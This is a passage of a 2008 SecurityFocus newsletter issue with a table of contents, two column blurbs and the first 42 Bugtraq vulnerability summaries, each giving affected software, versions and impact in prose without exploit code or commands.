WINDOWS CENTER: SecurityFocus Newsletter #458

SecurityFocus Newsletter #458
----------------------------------------

This issue is sponsored by Black Hat USA:

Attend Black Hat USA, August 2-7 in Las Vegas, the world's premier technical event for ICT security experts. Featuring 40 hands-on training courses and 80 Briefings presentations with lots of new content and new tools. Network with 4,000 delegates from 50 nations. Visit product displays by 30 top sponsors in a relaxed setting.

www.blackhat.com

SECURITY BLOGS
SecurityFocus has selected a few syndicated sources that stand out as conveying topics of interest for our community. We are proud to offer content from Matasano at this time and will be adding more in the coming weeks.
http://www.securityfocus.com/blogs

------------------------------------------------------------------
I. FRONT AND CENTER
1.Racing Against Reversers
2.Anti-Social Networking
II. BUGTRAQ SUMMARY
1. Xen Para Virtualized Frame Buffer Backend Local Denial of Service Vulnerability
2. Apple Mac OS X AppleScript ARDAgent Shell Local Privilege Escalation Vulnerability
3. CMS-BRD 'index.php' SQL Injection Vulnerability
4. TYPO3 DCD GoogleMap Extension Unspecified Cross-Site Scripting Vulnerability
5. Samart-cms 'site.php' SQL Injection Vulnerability
6. Academic Web Tools CMS 1.4.2.8 Multiple Input Validation Vulnerabilities
7. eLineStudio Site Composer Multiple Input Validation and Unauthorized Access Vulnerabilities
8. CGIWrap Error Page Handling Cross Site Scripting Vulnerability
9. OFFSystem HTTP Headers Remote Buffer Overflow Vulnerability
10. MediaWiki WikiHiero Extension Multiple Cross Site Scripting Vulnerabilities
11. Lyris ListManager 'words' Parameter Cross Site Scripting Vulnerability
12. Skulltag Malformed Packet Denial of Service Vulnerability
13. OpenDocMan 'out.php' Cross-Site Scripting Vulnerability
14. Crysis HTTP/XML-RPC Service Remote Denial of Service Vulnerability
15. Windows Media Player ASX PlayList File Heap Overflow Vulnerability
16. Microsoft Word Bulleted List Handling Remote Memory Corruption Vulnerability
17. Microsoft Windows Speech Components Voice Recognition Command Execution Vulnerability
18. Windows Media Player Remote ASF File Buffer Overflow Vulnerability
19. Novell iPrint Client ActiveX Control Multiple Stack Overflow Vulnerabilities
20. Apache HTTP Server 2.2.6, 2.0.61 and 1.3.39 'mod_status' Cross-Site Scripting Vulnerability
21. Apache 'mod_proxy_ftp' Undefined Charset UTF-7 Cross-Site Scripting Vulnerability
22. AJAX Chat Multiple Remote Vulnerabilities
23. Apache HTTP Server 413 Error HTTP Request Method Cross-Site Scripting Weakness
24. Adobe Acrobat and Reader Multiple Arbitrary Code Execution and Security Vulnerabilities
25. Computer Associates ARCserve Backup Discovery Service Remote Denial Of Service Vulnerability
26. Microsoft Internet Explorer 'setRequestHeader()' Multiple Vulnerabilities
27. ClamAV 'petite.c' Invalid Memory Access Denial Of Service Vulnerability
28. Linux Kernel CIFS Transport.C Remote Buffer Overflow Vulnerability
29. Linux Kernel 'fcntl_setlk()' SMP Ordering Local Denial of Service Vulnerability
30. Linux Kernel RLIMIT_CPU Zero Limit Handling Local Security Bypass Vulnerability
31. Linux Kernel PowerPC 'chrp/setup.c' NULL Pointer Dereference Denial of Serviced Vulnerability
32. Linux Kernel Driver Fault Handler 'mmap.c' Local Denial of Service Vulnerability
33. Linux Kernel 2.6.22.16 and Prior Multiple Memory Corruption Vulnerabilities
34. Linux Kernel ALSA snd-page-alloc Local Proc File Information Disclosure Vulnerability
35. Linux Kernel 'dnotify.c' Local Race Condition Vulnerability
36. Orlando CMS classes'GLOBALS['preloc']' Parameter Multiple Remote File Include Vulnerabilities
37. Apple Safari Automatic File Launch Remote Code Execution Vulnerability
38. Apple Safari and Microsoft Windows Client-side Code Execution Vulnerability
39. Mozilla Client Products Multiple Remote Vulnerabilities
40. Fetchmail Verbose Mode Large Log Messages Remote Denial of Service Vulnerability
41. MaxTrade Trade Module SQL Injection Vulnerability
42. PHP 5 'posix_access()' Function 'safe_mode' Bypass Directory Traversal Vulnerability
43. Cisco Intrustion Prevention System (IPS) Platforms Inline Mode Denial of Service Vulnerability
44. Apple Mac OS X ImageIO BMP/GIF Image Information Disclosure Vulnerability
45. Microsoft Visual Basic Enterprise Edition 6 'vb6skit.dll' Remote Buffer Overflow Vulnerability
46. X.Org X Server RENDER Extension 'ProcRenderCreateCursor()' Denial of Service Vulnerability
47. X.Org X Server MIT-SHM Extension Information Disclosure Vulnerability
48. X.Org X server RENDER Extension Multiple Integer Overflow Vulnerabilities
49. Microsoft Windows Bluetooth Stack Remote Code Execution Vulnerability
50. UltraEdit FTP/SFTP 'LIST' Command Directory Traversal Vulnerability
51. Exero CMS 'theme' Parameter Multiple Local File Include Vulnerabilities
52. ManageEngine OpUtils 'hostName' HTML Injection Vulnerability
53. CRE Loaded Multiple HTML Injection Vulnerabilities
54. Traindepot Local File Include and Cross-Site Scripting Vulnerabilities
55. WebCalendar 'tools/send_reminders.php' Remote File Include Vulnerability
56. EroCMS 'site' parameter SQL Injection Vulnerability
57. ClipShare 'group_posts.php' SQL Injection Vulnerability
58. Adobe Flex 3 History Management 'historyFrame.html' Cross-Site Scripting Vulnerability
59. MyShoutPro 'admin_access' Cookie Parameter Authentication Bypass Vulnerability
60. easyTrade 'detail.php' SQL Injection Vulnerability
61. PHP Site Lock 'index.php' SQL Injection Vulnerability
62. Foxy 'fs' Parameter Memory Exhaustion Remote Denial of Service Vulnerability
63. FreeCMS 'index.php' SQL Injection Vulnerability
64. ThaiQuickCart 'PHPSESSID' Cookie Parameter Local File Include Vulnerability
65. Basic-CMS 'index.php' SQL Injection Vulnerability
66. Bizon-CMS 'photo/index.php' SQL Injection Vulnerability
67. Comparison Engine Power 'product.detail.php' SQL Injection Vulnerability
68. Jura Internet Connectivity Kit Unauthorized Access Input-Validation Vulnerability
69. Opera Web Browser 9.27 Multiple Security Vulnerabilities
70. LifeType 'index.php' SQL Injection Vulnerability
71. photokorn 'pic' Parameter SQL Injection Vulnerability
72. Multiple Vendor HTML Form Protocol Vulnerability
73. OpenBSD GNU Screen Locked Authentication Bypass Vulnerability
74. Photokorn Multiple SQL Injection Vulnerabilities
75. FreeType TrueType Font 'SHC' Heap Buffer Overflow Vulnerability
76. FreeType2 Printer Font Binary Private Dictionary Table Integer Overflow Vulnerability
77. FreeType2 Printer Font Binary Remote Code Exeuction Vulnerability
78. Debian OpenSSL Package Random Number Generator Weakness
79. BlognPlus Unspecified SQL Injection Vulnerability
80. AJ Auction 'id' Parameter SQL Injection Vulnerability
81. AJ Auction Pro 'cate_id' Parameter SQL Injection Vulnerability
82. Lotus Core CMS 'phpbb_root_path' Parameter Multiple Remote File Include Vulnerabilities
83. TYPO3 Frontend Filemanager Extension Unspecified Code Execution Vulnerability
84. Apple Safari WebKit JavaScript Arrays Remote Buffer Overflow Vulnerability
85. CaupoShop 'csc_article_details.php' SQL Injection Vulnerability
86. TYPO3 nepa-design.de Spam Protection Extension Unspecified Setting Manipulation Vulnerability
87. TYPO3 Resource Library Extension Unspecified Cross-Site Scripting Vulnerability
88. MindTouch DekiWiki Search Cross-Site Scripting Vulnerability
89. PHP 'rfc822_write_address()' Function Buffer Overflow Vulnerability
90. TYPO3 JobControl Extension Unspecified Cross-Site Scripting Vulnerability
91. TYPO3 Random Prayer Extension SQL Injection Vulnerability
92. TYPO3 TARGET-E WorldCup Bets Extension Multiple Unspecified Input Validation Vulnerabilities
93. TYPO3 Download system Extension SQL Injection Vulnerability
94. TYPO3 Fussballtippspiel Extension SQL Injection Vulnerability
95. TYPO3 TIMTAB Social Bookmark Icons Extension SQL Injection Vulnerability
96. TYPO3 Diocese of Portsmouth Training Courses Extension SQL Injection Vulnerability
97. TYPO3 CoolURI Extension SQL Injection Vulnerability
98. TYPO3 Diocese of Portsmouth Calendar Today Extension SQL Injection Vulnerability
99. OwnRS 'clanek.php' Multiple Input Validation Vulnerabilities
100. vBulletin Moderation Control Panel 'redirect' Parameter Cross-Site Scripting Vulnerability
III. SECURITYFOCUS NEWS
1. Ransomware resisting crypto cracking efforts
2. Boycott spotlights antivirus testing issues
3. Hired gun blamed for business outage
4. Legal experts wary of MySpace hacking charges
IV. SECURITY JOBS LIST SUMMARY
1. [SJ-JOB] Director, Computer Security, Fort Lauderdale
2. [SJ-JOB] Certification & Accreditation Engineer, Laurel
3. [SJ-JOB] Sr. Security Analyst, Washington
4. [SJ-JOB] Sr. Security Engineer, Jersey City
5. [SJ-JOB] Sr. Security Engineer, San Jose
6. [SJ-JOB] Security Consultant, Columbus/Cincinnati/Indianapolis
7. [SJ-JOB] Sales Engineer, Bangalore, New Delhi and Hyderabad
8. [SJ-JOB] Security Architect, Chicago
9. [SJ-JOB] Security Engineer, Herndon
10. [SJ-JOB] Security System Administrator, Washington
11. [SJ-JOB] Penetration Engineer, San Francisco
12. [SJ-JOB] Developer, Ciudad de Buenos Aires - Palermo
13. [SJ-JOB] Application Security Engineer, Chicago
14. [SJ-JOB] Sr. Product Manager, Boston
15. [SJ-JOB] Security Consultant, Atlanta
16. [SJ-JOB] Security Engineer, Atlanta
17. [SJ-JOB] Developer, Arlington
18. [SJ-JOB] Technical Writer, Alpharetta
19. [SJ-JOB] Developer, Ciudad de Buenos Aires - Palermo
20. [SJ-JOB] Security Consultant, Atlanta
21. [SJ-JOB] Sr. Product Manager, Atlanta
22. [SJ-JOB] Sales Engineer, St. Paul
23. [SJ-JOB] Sr. Product Manager, San Jose
24. [SJ-JOB] Sr. Product Manager, Washington
V. INCIDENTS LIST SUMMARY
VI. VULN-DEV RESEARCH LIST SUMMARY
VII. MICROSOFT FOCUS LIST SUMMARY
1. default for requiring authentication 2003
VIII. SUN FOCUS LIST SUMMARY
IX. LINUX FOCUS LIST SUMMARY
1. Vulnerability and Patch-Management in Linux (and other Unix)
X. UNSUBSCRIBE INSTRUCTIONS
XI. SPONSOR INFORMATION

I. FRONT AND CENTER
---------------------
1.Racing Against Reversers
By Federico Biancuzzi
Each time a new digital rights management (DRM) system is released, hackers are not far behind in cracking it. Reverse engineers have taken down the security protecting content encoded for Windows Media, iTunes, DVDs, and HD-DVDs.

http://www.securityfocus.com/columnists/474

2.Anti-Social Networking
By Mark Rasch
On May 15, 2008, a federal grand jury Los Angeles indicted 49-year-old Lori Drew of O.Fallon, Missouri, on charges of unauthorized access to a computer, typically used in hacking cases. Yet, Drew's alleged actions had little to do with computer intrusions.

http://www.securityfocus.com/columnists/473

II. BUGTRAQ SUMMARY
--------------------
1. Xen Para Virtualized Frame Buffer Backend Local Denial of Service Vulnerability
BugTraq ID: 29183
Remote: No
Last Updated: 2008-06-20
Relevant URL: http://www.securityfocus.com/bid/29183
Summary:
Xen is prone to a local denial-of-service vulnerability.

Successfully exploiting this issue will crash the affected application, denying service to legitimate users.
Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.

2. Apple Mac OS X AppleScript ARDAgent Shell Local Privilege Escalation Vulnerability
BugTraq ID: 29831
Remote: No
Last Updated: 2008-06-20
Relevant URL: http://www.securityfocus.com/bid/29831
Summary:
Mac OS X is prone to a local privilege-escalation vulnerability affecting ARDAgent (Apple Remote Desktop).

Successful exploits allow local attackers to execute arbitrary code with superuser privileges, completely compromising the affected computer.

This issue is confirmed to affect Mac OS X 10.5 versions; earlier versions may also be vulnerable.

3. CMS-BRD 'index.php' SQL Injection Vulnerability
BugTraq ID: 29816
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29816
Summary:
CMS-BRD is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

4. TYPO3 DCD GoogleMap Extension Unspecified Cross-Site Scripting Vulnerability
BugTraq ID: 29815
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29815
Summary:
The DCD GoogleMap extension for TYPO3 is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

DCD GoogleMap versions prior to 1.1.1 are vulnerable.

5. Samart-cms 'site.php' SQL Injection Vulnerability
BugTraq ID: 29814
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29814
Summary:
samart-cms is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

samart-cms 2.0 is vulnerable; other versions may also be affected.

6. Academic Web Tools CMS 1.4.2.8 Multiple Input Validation Vulnerabilities
BugTraq ID: 29813
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29813
Summary:
Academic Web Tools CMS is prone to multiple input-validation vulnerabilities, including

- A directory-traversal vulnerability
- Multiple cross-site scripting vulnerability
- An HTML-injection vulnerability.
- An SQL-injection vulnerability
- Multiple session-fixation vulnerabilities

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, gain unauthorized access to the affected application, access or modify data, execute arbitrary local scripts, retrieve potentially sensitive information, or exploit latent vulnerabilities in the underlying database

Academic Web Tools CMS 1.4.2.8 is vulnerable; other versions may also be affected.

7. eLineStudio Site Composer Multiple Input Validation and Unauthorized Access Vulnerabilities
BugTraq ID: 29812
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29812
Summary:
eLineStudio Site Composer is prone to multiple vulnerabilities due a lack of input validation as well as access restriction. These issues include two SQL-injection issues, four cross-site scripting issues and two vulnerabilities resulting in unauthorized access of administrative functions.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, create or delete folders on the webserver, or exploit latent vulnerabilities in the underlying database.

eLineStudio Site Composer 2.6 is vulnerable; other versions may also be affected.

8. CGIWrap Error Page Handling Cross Site Scripting Vulnerability
BugTraq ID: 29811
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29811
Summary:
CGIWrap is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

CGIWrap versions prior to 4.1 are vulnerable.

9. OFFSystem HTTP Headers Remote Buffer Overflow Vulnerability
BugTraq ID: 29809
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29809
Summary:
OFFSystem is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. The vulnerability occurs when parsing HTTP headers.

An attacker may exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts may result in a denial-of-service condition.

Versions of OFFSystem up to 0.19.14 are vulnerable.

10. MediaWiki WikiHiero Extension Multiple Cross Site Scripting Vulnerabilities
BugTraq ID: 29762
Remote: Yes
Last Updated: 2008-06-18
Relevant URL: http://www.securityfocus.com/bid/29762
Summary:
WikiHiero, a MediaWiki extension, is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

11. Lyris ListManager 'words' Parameter Cross Site Scripting Vulnerability
BugTraq ID: 29761
Remote: Yes
Last Updated: 2008-06-18
Relevant URL: http://www.securityfocus.com/bid/29761
Summary:
Lyris ListManager is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.

Lyris ListManager 9.3d is vulnerable; previous versions may also be affected.

12. Skulltag Malformed Packet Denial of Service Vulnerability
BugTraq ID: 29760
Remote: Yes
Last Updated: 2008-06-18
Relevant URL: http://www.securityfocus.com/bid/29760
Summary:
Skulltag is prone to a vulnerability that can cause denial-of-service conditions.

A successful attack will deny service to legitimate users.

Skulltag 0.97d2-RC3 is vulnerable; other versions may also be affected.

13. OpenDocMan 'out.php' Cross-Site Scripting Vulnerability
BugTraq ID: 29765
Remote: Yes
Last Updated: 2008-06-18
Relevant URL: http://www.securityfocus.com/bid/29765
Summary:
OpenDocMan is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.

OpenDocMan 1.2.5 is vulnerable; other versions may also be affected.

14. Crysis HTTP/XML-RPC Service Remote Denial of Service Vulnerability
BugTraq ID: 29759
Remote: Yes
Last Updated: 2008-06-18
Relevant URL: http://www.securityfocus.com/bid/29759
Summary:
Crysis is prone to a remote denial-of-service vulnerability because the application fails to handle exceptional conditions.

An attacker can exploit this issue to crash the affected application, denying further service to legitimate users.

Crysis 1.21 is vulnerable; other versions may also be affected.

15. Windows Media Player ASX PlayList File Heap Overflow Vulnerability
BugTraq ID: 21247
Remote: Yes
Last Updated: 2008-06-18
Relevant URL: http://www.securityfocus.com/bid/21247
Summary:
Windows Media Player is prone to a heap-overflow issue.

Successfully exploiting this issue allows remote attackers to execute arbitrary machine code in the context of the affected user. Failed exploit attempts likely result in application crashes.

16. Microsoft Word Bulleted List Handling Remote Memory Corruption Vulnerability
BugTraq ID: 29769
Remote: Yes
Last Updated: 2008-06-18
Relevant URL: http://www.securityfocus.com/bid/29769
Summary:
Microsoft Word is prone to a remote memory-corruption vulnerability.

An attacker could exploit this issue by enticing a victim to open and interact with malicious Word files.

Successfully exploiting this issue will corrupt memory and crash the application. Given the nature of this issue, attackers may also be able to execute arbitrary code in the context of the currently logged-in user.

17. Microsoft Windows Speech Components Voice Recognition Command Execution Vulnerability
BugTraq ID: 22359
Remote: Yes
Last Updated: 2008-06-18
Relevant URL: http://www.securityfocus.com/bid/22359
Summary:
Microsoft Windows is prone to a command-execution vulnerability because of its Speech Components built-in voice-recognition capability.

An attacker can exploit this issue to execute commands on a victim user's computer.

NOTE: Given the nature of this vulnerability, victim users will notice exactly what is occurring as it happens.

18. Windows Media Player Remote ASF File Buffer Overflow Vulnerability
BugTraq ID: 21505
Remote: Yes
Last Updated: 2008-06-18
Relevant URL: http://www.securityfocus.com/bid/21505
Summary:
Windows Media Player is prone to a buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data.

Attackers may attempt to exploit this issue by coercing users to visit a malicious website or to access malicious ASF files.

Successfully exploiting this issue allows remote attackers to execute arbitrary machine code in the context of the user running the affected application. This facilitates the remote compromise of affected computers.

19. Novell iPrint Client ActiveX Control Multiple Stack Overflow Vulnerabilities
BugTraq ID: 29736
Remote: Yes
Last Updated: 2008-06-18
Relevant URL: http://www.securityfocus.com/bid/29736
Summary:
Novell iPrint Client ActiveX control is prone to multiple stack-based buffer-overflow vulnerabilities.

An attacker can exploit these issues by tricking a victim into viewing a malicious web page. A successful attack will allow attacker-supplied code to run in the context of the currently logged-in user.

The issue affects versions prior to iPrint Client 4.36.

20. Apache HTTP Server 2.2.6, 2.0.61 and 1.3.39 'mod_status' Cross-Site Scripting Vulnerability
BugTraq ID: 27237
Remote: Yes
Last Updated: 2008-06-18
Relevant URL: http://www.securityfocus.com/bid/27237
Summary:
The Apache HTTP Server 'mod_status' module is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Reportedly, attackers can also use this issue to redirect users' browsers to arbitrary locations, which may aid in phishing attacks.

The issue affects versions prior to Apache 2.2.7-dev, 2.0.62-dev, and 1.3.40-dev.

21. Apache 'mod_proxy_ftp' Undefined Charset UTF-7 Cross-Site Scripting Vulnerability
BugTraq ID: 27234
Remote: Yes
Last Updated: 2008-06-18
Relevant URL: http://www.securityfocus.com/bid/27234
Summary:
Apache 'mod_proxy_ftp' is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.

This issue is reported to affect versions prior to Apache 2.2.7-dev, Apache 1.3.40-dev, and Apache 2.0.62-dev.

22. AJAX Chat Multiple Remote Vulnerabilities
BugTraq ID: 19238
Remote: Yes
Last Updated: 2008-06-18
Relevant URL: http://www.securityfocus.com/bid/19238
Summary:
AJAX Chat is prone to both a directory-traversal vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit the directory-traversal issue to retrieve arbitrary files from the vulnerable system in the context of the affected application. Information obtained may aid in further attacks.

The attacker may also leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

These issues affect AJAX Chat 0.1; other versions may also be vulnerable.

23. Apache HTTP Server 413 Error HTTP Request Method Cross-Site Scripting Weakness
BugTraq ID: 26663
Remote: Yes
Last Updated: 2008-06-18
Relevant URL: http://www.securityfocus.com/bid/26663
Summary:
Apache is prone to a cross-site scripting weakness when handling HTTP request methods that result in 413 HTTP errors.

An attacker may exploit this issue to steal cookie-based authentication credentials and launch other attacks.

Apache 2.0.46 through 2.2.4 are vulnerable; other versions may also be affected.

24. Adobe Acrobat and Reader Multiple Arbitrary Code Execution and Security Vulnerabilities
BugTraq ID: 27641
Remote: Yes
Last Updated: 2008-06-18
Relevant URL: http://www.securityfocus.com/bid/27641
Summary:
Adobe Acrobat and Reader are prone to multiple arbitrary remote code-execution and security vulnerabilities.

Attackers can exploit these issues to execute arbitrary code in the context of the user running the affected application. Other attacks are also possible.

Versions prior to Adobe Acrobat and Adobe Reader 8.1.2 are vulnerable to these issues.

25. Computer Associates ARCserve Backup Discovery Service Remote Denial Of Service Vulnerability
BugTraq ID: 28927
Remote: Yes
Last Updated: 2008-06-18
Relevant URL: http://www.securityfocus.com/bid/28927
Summary:
Computer Associates ARCserve Backup is affected by a denial-of-service vulnerability because the application mishandles malformed user-supplied input.

A remote attacker may exploit this issue to cause denial-of-service conditions.

CA ARCserve Backup 12.0.5454.0 is affected by this issue; other versions may also be vulnerable.

26. Microsoft Internet Explorer 'setRequestHeader()' Multiple Vulnerabilities
BugTraq ID: 28379
Remote: Yes
Last Updated: 2008-06-18
Relevant URL: http://www.securityfocus.com/bid/28379
Summary:
Microsoft Internet Explorer is prone to multiple vulnerabilities that allow for referer-spoofing, HTTP-request-splitting, and HTTP-request-smuggling attacks.

A remote attacker may leverage these classes of attacks to poison web caches, steal credentials, evade IDS signatures, and launch cross-site scripting, HTML-injection, and session-hijacking attacks. Other attacks are also possible.

27. ClamAV 'petite.c' Invalid Memory Access Denial Of Service Vulnerability
BugTraq ID: 29750
Remote: Yes
Last Updated: 2008-06-20
Relevant URL: http://www.securityfocus.com/bid/29750
Summary:
ClamAV is prone to a denial-of-service vulnerability caused by an invalid memory access during a 'memcpy()' call.

Attackers can exploit this issue to cause denial-of-service conditions. Given the nature of this issue, remote code execution may also be possible, but this has not been confirmed.

Versions prior to ClamAV 0.93.1 are vulnerable.

28. Linux Kernel CIFS Transport.C Remote Buffer Overflow Vulnerability
BugTraq ID: 26438
Remote: Yes
Last Updated: 2008-06-20
Relevant URL: http://www.securityfocus.com/bid/26438
Summary:
The Linux kernel is prone to a remote buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before copying it into an insufficiently sized buffer.

An attacker can exploit this issue to execute arbitrary code with kernel-level privileges or cause the affected kernel to crash, denying service to legitimate users.

This issue affects version 2.6.23.1; previous versions may also be affected.

29. Linux Kernel 'fcntl_setlk()' SMP Ordering Local Denial of Service Vulnerability
BugTraq ID: 29076
Remote: No
Last Updated: 2008-06-20
Relevant URL: http://www.securityfocus.com/bid/29076
Summary:
The Linux kernel is prone to a local denial-of-service vulnerability.

Attackers can exploit this issue to trigger kernel crashes, denying service to legitimate users.

Versions prior to Linux kernel 2.6.25.2 and 2.4.36.4 are vulnerable.

30. Linux Kernel RLIMIT_CPU Zero Limit Handling Local Security Bypass Vulnerability
BugTraq ID: 29004
Remote: No
Last Updated: 2008-06-20
Relevant URL: http://www.securityfocus.com/bid/29004
Summary:
The Linux kernel is prone to a local security-bypass vulnerability because it fails to properly handle certain RLIMIT_CPU time limitations.

Attackers can exploit this issue to bypass certain security restrictions, which may lead to further attacks.

Versions prior to Linux kernel 2.6.22 are affected.

31. Linux Kernel PowerPC 'chrp/setup.c' NULL Pointer Dereference Denial of Serviced Vulnerability
BugTraq ID: 27555
Remote: No
Last Updated: 2008-06-20
Relevant URL: http://www.securityfocus.com/bid/27555
Summary:
The Linux kernel is prone to a local denial-of-service vulnerability.

Attackers can exploit this issue to crash the affected kernel, denying service to legitimate users.

This issue affects Linux kernel 2.4.21 through 2.6.18-53 running on the PowerPC architecture.

32. Linux Kernel Driver Fault Handler 'mmap.c' Local Denial of Service Vulnerability
BugTraq ID: 27705
Remote: No
Last Updated: 2008-06-20
Relevant URL: http://www.securityfocus.com/bid/27705
Summary:
The Linux kernel is prone to a local denial-of-service vulnerability because it fails to properly bounds-check certain fault handlers for device drivers.

Attackers can exploit this issue to trigger kernel crashes, denying service to legitimate users. Given the nature of this issue, attackers may also be able to execute arbitrary code, but this has not been confirmed.

Versions prior to Linux kernel 2.6.24.1 are vulnerable.

33. Linux Kernel 2.6.22.16 and Prior Multiple Memory Corruption Vulnerabilities
BugTraq ID: 27686
Remote: No
Last Updated: 2008-06-20
Relevant URL: http://www.securityfocus.com/bid/27686
Summary:
The Linux kernel is prone to multiple memory-corruption vulnerabilities due to insufficient range checking in certain fault handlers.

Local attackers could exploit these issues to cause denial-of-service conditions, bypass certain security restrictions, and potentially access sensitive information or gain elevated privileges.

These issues affect versions prior to 2.6.22.17.

34. Linux Kernel ALSA snd-page-alloc Local Proc File Information Disclosure Vulnerability
BugTraq ID: 25807
Remote: No
Last Updated: 2008-06-20
Relevant URL: http://www.securityfocus.com/bid/25807
Summary:
The Linux kernel is prone to an information-disclosure vulnerability.

Successful exploits will allow attackers to obtain portions of kernel memory. Information harvested may aid in further attacks.

Versions of the Linux kernel prior to 2.6.22.8 are vulnerable.

35. Linux Kernel 'dnotify.c' Local Race Condition Vulnerability
BugTraq ID: 29003
Remote: No
Last Updated: 2008-06-20
Relevant URL: http://www.securityfocus.com/bid/29003
Summary:
The Linux kernel is prone to a local race-condition vulnerability.

A local attacker may exploit this issue to crash the computer or to gain elevated privileges on the affected computer.

36. Orlando CMS classes'GLOBALS['preloc']' Parameter Multiple Remote File Include Vulnerabilities
BugTraq ID: 29820
Remote: Yes
Last Updated: 2008-06-20
Relevant URL: http://www.securityfocus.com/bid/29820
Summary:
Orlando CMS classes is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible.

Orlando CMS classes 0.6 is vulnerable; other versions may also be affected.

37. Apple Safari Automatic File Launch Remote Code Execution Vulnerability
BugTraq ID: 29835
Remote: Yes
Last Updated: 2008-06-20
Relevant URL: http://www.securityfocus.com/bid/29835
Summary:
Apple Safari is prone to a remote code-execution vulnerability.

An attacker can exploit this issue by enticing an unsuspecting victim to visit a malicious webpage contained in a trusted Internet Explorer 7 zone or contained in an Internet Explorer 6 'local intranet' or 'Trusted site' zone.

Successfully exploiting this issue will allow attackers to execute arbitrary code with the privileges of the user running the affected application.

This issue affects versions prior to Apple Safari 3.1.2 running on Microsoft Windows XP and Windows Vista.

38. Apple Safari and Microsoft Windows Client-side Code Execution Vulnerability
BugTraq ID: 29445
Remote: Yes
Last Updated: 2008-06-20
Relevant URL: http://www.securityfocus.com/bid/29445
Summary:
A vulnerability in Apple Safari on the Microsoft Windows operating system stems from a combination of security issues in Safari and all versions of Windows XP and Vista that will allow executables to be downloaded to a user's computer and run without prompting.

A vulnerability in Safari, known as the 'carpet-bombing' issue reported by Nitesh Dhanjani, allows an attacker to silently place malicious DLL files on a victim's computer. A problem in Internet Explorer, reported in December of 2006 by Aviv Raff, can then be used to run those malicious DLLs.

An attacker can exploit this issue by tricking a victim into visiting a malicious page with Safari; the malicious files will run when the victim starts Internet Explorer.

39. Mozilla Client Products Multiple Remote Vulnerabilities
BugTraq ID: 20957
Remote: Yes
Last Updated: 2008-06-20
Relevant URL: http://www.securityfocus.com/bid/20957
Summary:
The Mozilla Foundation has released two security advisories specifying vulnerabilities in Mozilla Firefox, SeaMonkey, and Thunderbird.

These vulnerabilities allow attackers to:

- Crash the applications and potentially execute arbitrary machine code in the context of the vulnerable applications.
- Run arbitrary JavaScript bytecode.

Other attacks may also be possible.

The issues described here will be split into individual BIDs as more information becomes available.

These issues are fixed in:

- Mozilla Firefox 1.5.0.8
- Mozilla Thunderbird 1.5.0.8
- Mozilla SeaMonkey 1.0.6

40. Fetchmail Verbose Mode Large Log Messages Remote Denial of Service Vulnerability
BugTraq ID: 29705
Remote: Yes
Last Updated: 2008-06-20
Relevant URL: http://www.securityfocus.com/bid/29705
Summary:
Fetchmail is prone to a denial-of-service vulnerability because the application fails to handle exceptional conditions.

An attacker can exploit this issue to crash the affected application, denying service to legitimate users. Given the nature of the issue, remote code execution may also be possible, but this has not been confirmed.

Versions prior to Fetchmail 6.3.9 are vulnerable.

41. MaxTrade Trade Module SQL Injection Vulnerability
BugTraq ID: 29799
Remote: Yes
Last Updated: 2008-06-20
Relevant URL: http://www.securityfocus.com/bid/29799
Summary:
MaxTrade is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

MaxTrade 1.3.23 is vulnerable; other versions may also be affected.

42. PHP 5 'posix_access()' Function 'safe_mode' Bypass Directory Traversal Vulnerability
BugTraq ID: 29797
Remote: Yes
Last Updated: 2008-06-20
Relevant URL: http://www.securityfocus.com/bid/29797
Summary:
PHP is prone to a directory-traversal vulnerability because it fails to adequately sanitize user-supplied data.

Attackers can leverage this issue to bypass security restrictions enforced by 'safe_mode' to access data outside of the root webserver directory. Successful attacks may allow an attacker to access sensitive information that could aid in further attacks.

PHP 5.2.6 is vulnerable; other versions may also be affected.

